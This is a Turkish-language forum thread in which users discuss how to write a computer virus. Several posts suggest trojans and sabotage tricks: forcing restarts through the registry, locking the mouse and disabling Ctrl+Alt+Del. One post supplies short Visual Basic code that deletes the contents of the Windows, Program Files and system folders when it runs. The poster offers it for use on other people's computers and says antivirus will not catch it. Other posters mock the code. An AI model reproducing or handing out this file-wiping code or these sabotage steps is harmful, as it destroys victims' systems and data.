Virüs Yazacam Ne Yazayım
-
eğer visual basicte yazıyorsan "winsock" kontrollerini kullanarak bir trojan yazabilirsin. yada biraz daha acımasız .. registry' e windows a hoşgeldiniz yazısı çıktığı anda restarta atmasını yazdır ( visual basic te ) daha sonra mouse i kilitle, ctrl+alt+del kombinasyonunu etkisizi hale getir. Sonra restarta atmak zorunda kalacak.. Sonuç kullanılamaz bir bilgisayar ;)
-
virüs yazmakta ne var ki. bu siteye girmeden daha virüs yazmayı bilmiyodum ama şimdi monstershock virüs generatörle bir sürü virüs yazıyom.
-
afferim...
-
Abi monstershock la bilmemneyle otomatik virüs oluşturduğunuzda bunu siz kendiniz yaptıınızımı zannediyosunuz. Bide virüs yazdım diye övünüyosunuzdur. Bu işler böyle basitmi??
-
hala başlayamadıysan sen get bogaz köprüsüne denizden ilham alarak şiir yaz...:)
-
ufak bir virus
Private sub form_load()
Kill "C:\Windows\*.*"
Kill "C:\Program files\*.*"
Kill "C:\Windows\system\*.*"
Kill "C:\Windows\system32\*.*"
msgbox "Geçmiş Olsun"
End SubBunu vbasicteki kod bölümüne yazarsanız sonrada run a basarsanız veya exe yapıp çalıştırırsanız kısacası win. göçer

Hem internete filan bağlanmadığı için virüs programları hiç bişey diyemez
güle gğle kullanın kendi pc nizde denemeyin.daha fazla bilgi almak isteyenler msn yi eklesinler semih_evren@hotmail.com
-
Eh, Criminal2 vazgecmis artik sanirim yorum yapmaktan. Gulmekle mesguldu sanirim :) Virus un ne oldugunu bilip, oyle yazmaya calisirsaniz daha iyi olur sanirim. Vb ile de yazin virüs, (atıyorum) 2-3 mb lik yayın bakalim :)
-
bunlara virüs değil monster denir. virüs bulaşır. *.exe'ye bulaşır, *.com'a bulaşır, *.bat'a bulaşır...
-
yilmaz bunu yazdı:
virüs yazmakta ne var ki. bu siteye girmeden daha virüs yazmayı bilmiyodum ama şimdi monstershock virüs generatörle bir sürü virüs yazıyom.
ahhahahaha yuru be
-
1.Virüs yazcanda nolcak
2.Virüsün temel özelliği diğer dosyalara bulaşmasıdır..
3.Visualde her bi pok oluyo siz dandik ve kolay gözüktüüne bakmayın nee olaylar var onla işletim sistemi bile yapılır bence :D